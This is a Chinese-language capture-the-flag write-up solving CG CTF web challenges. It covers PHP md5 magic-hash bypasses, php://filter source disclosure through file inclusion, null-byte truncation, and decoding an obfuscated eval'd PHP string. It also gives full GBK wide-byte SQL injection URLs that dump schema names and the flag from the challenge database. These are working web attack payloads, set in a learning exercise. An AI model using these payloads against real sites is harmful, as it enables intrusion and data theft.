CG CTF web 上

签到题

打开f12查看源代码得到flag

md5 collision

把变量md51，md5加密后得到 0e830400451993494058024219903391
当成科学计算法，0的无论多少次方都是0
代码中提到
变量md52等于md5加密后的a参数
但是变量a不能等于未md5加密的md51
所以让a等于一个md5加密后为0e开头的字符串，用科学计数法看两者都为0
s878926199a的md5加密后为
0e545993274517709034328855841020
所以

签到2

口令已经给出来了
一个个输入，发现最后一个n不能输进去，看来有输入长度限制
打开F12修改maxlength为11或更多

重新输入口令，开门得到flag

这题不是WEB

F12没有线索，说了这题不是web，题目很像杂项，从GIF找线索，另存图片GIF，用记事本打开得flag

层层递进

打开是一个平台F12查看源代码

发现S0.html页面，进入页面http://chinalover.sinaapp.com/web3/S0.html
又发现

在进入SO.htm

进入S0.htm

进入404.html

看到一堆js文件，却是注释，认真一看发现flag

AAencode

看到颜文字，是一种密码，颜文字js加密，扔到控制台跑

得到flag

php decode

<?php
function CLsI($ZzvSWE) {$ZzvSWE = gzinflate(base64_decode($ZzvSWE));for ($i = 0; $i < strlen($ZzvSWE); $i++) {$ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);}return $ZzvSWE;}
eval(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));
?>

这里eval函数得用法有问题，eval(string) string中含有要计算的 JavaScript 表达式或要执行的语句。
上面的string明显不是可计算式子或可执行代码
改为echo更合适
修改后在PHP中运行

<?phpfunction CLsI($ZzvSWE)
{$ZzvSWE = gzinflate(base64_decode($ZzvSWE));for ($i = 0; $i < strlen($ZzvSWE); $i++) {$ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);}return $ZzvSWE;}echo(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));

得到flag

单身二十年

经大佬blog启示
当按下key到这里找的时候，观察url，其实在跳到no_key_is_here_forever.php这个文件之前，跳到了另一个，只不过太快了，所以我们关掉js
如何关掉js在这里https://blog.csdn.net/fatong3/article/details/53690580

然后再点击一次key在这里，得到key

文件包含

点击超链接得到test123，F12查看源代码没有有用信息
所以猜测文件是一个包含可执行php代码得php文件，用base64解读此文件
关于php://filter了解
目标文件resource=index.php
所以

得到base64代码，解码后得

<?phperror_reporting(0);if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "Oh no!";exit();}include($file);
//flag:nctf{edulcni_elif_lacol_si_siht}?>

得到flag

Download~!

题目挂了

MYSQL

点开提示了robots.txt，进入这个页面

得到代码

<?php
if($_GET[id]) {mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select_db(SAE_MYSQL_DB);$id = intval($_GET[id]);//intval() 函数用于获取变量的整数值。$query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));if ($_GET[id]==1024) {echo "<p>no! try again</p>";}else{echo($query[content]);}
}
?>

并提示了sql.php
所以向sql.php页面传入参数id
先传入id=1025,得到一串字母
h4cked_By_w00dPeck3r
加入nctf大小写和直接输入都不是正确的flag
所以换一个id
从id=1026就页面空白了，从1020一下的id也是空白，除id=1024是try again，其他都是相同一串字符
想起intval()函数的用法，猜想id是在1024里面的，id=1024.7等id里面
果然

得到flag

GBK Injection

GBK编码，联想到宽字节注入，点击这里了解宽字节注入。
为了吃掉自动转义，这里使用%df （ASCII大于128）加上自动转义出来的 \ 成为两个字符，认为是应该汉字，把 \ 吃掉

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df'//报错
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df' and 1=1%23//不报错
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df' and 1='1'%23//报错
//由以上得到存在注入
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2%23 //字段为2
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df' union select 1,database()%23 //爆库名
sae-chinalover //得到库名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572%23 //原本是"sae-chinalover "但是引号会被转义，所以把sae-chinalover 转换为十六进制，前面加0x代替[这里](https://www.bejson.com/convert/ox2str/)字符串转十六进制
ctf,ctf2,ctf3,ctf4,gbksqli,news //是获得的表名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df' union select 1,group_concat(column_name)from information_schema.columns where table_schema = 0x7361652d6368696e616c6f766572 and table_name=0x63746634%23 //现在我爆的是ctf4这列,flag在里面
id ,flag //得到列
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df' union select 1,group_concat(flag) from ctf4%23
得到flag！

/x00

if (isset ($_GET['nctf'])) {if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)echo '必须输入数字才行';else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   die('Flag: '.$flag);elseecho '骚年，继续努力吧啊~';}

strpos() 函数查找字符串在另一字符串中第一次出现的位置。（来自菜鸟教程）

没有定义start，默认从头开始寻找
即是传入参数要包含#biubiubiu ，但是与全部都是数字相矛盾
题目两个00提示了截断式漏洞，又url的#后面内容会被视为位置标识符，所以#用url编码%23
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=12345%00%23biubiubiu
得到flag

bypass again

if (isset($_GET['a']) and isset($_GET['b'])) {if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}

就是参数a和b不能相等但是他们md5解密后要相等，同样使用科学计数法，0的不论多少次方都为0，找两个md5解密后开头为0e的字符串赋给参数ab
http://chinalover.sinaapp.com/web17/index.php?a=s878926199a&b=s155964671a
以上其中一个例子
得到flag

CG CTF web 上相关推荐

CG CTF WEB 上传绕过
http://teamxlc.sinaapp.com/web5/21232f297a57a5a743894a0e4a801fc3/index.html 题解: 原理: 00截断是文件后缀名就一个%00 ...
CG CTF WEB SQL注入2
http://4.chinalover.sinaapp.com/web6/index.php 题解: <html> <head> Secure Web Login II < ...
CG CTF WEB SQL注入1
http://chinalover.sinaapp.com/index.php 题解: <html> <head> Secure Web Login </head> ...
CG CTF WEB 密码重置2
http://nctf.nuptzj.cn/web14/index.php TIPS: 1.管理员邮箱观察一下就可以找到 2.linux下一般使用vi编辑器,并且异常退出会留下备份文件 3.弱类型by ...
CG CTF WEB MYSQL
http://chinalover.sinaapp.com/web11/ 题解: 题目提示robots.txt,首先访问http://chinalover.sinaapp.com/web11/robo ...
CG CTF WEB 层层递进
http://chinalover.sinaapp.com/web3/ 题解: F12审查页面元素,然后在我们的仔细审查下,在iframe标签中,我们发现了一些特别的地方: 发现好几个属性值都是0 ...
CG CTF WEB 综合题2
http://cms.nuptzj.cn/ 题解: MzAzMTY3YWQxZDlmZmUyNGIxOWNjZWI1OWY4NzA3ZmU= base64解密 303167ad1d9ffe24b19c ...
CG CTF WEB 综合题
http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/index.php 题解: [][(![]+[])[!![]+!![] ...
CG CTF WEB 变量覆盖
http://chinalover.sinaapp.com/web24/ <!--foreach($_GET as $key => $value){ $$key = $value; } i ...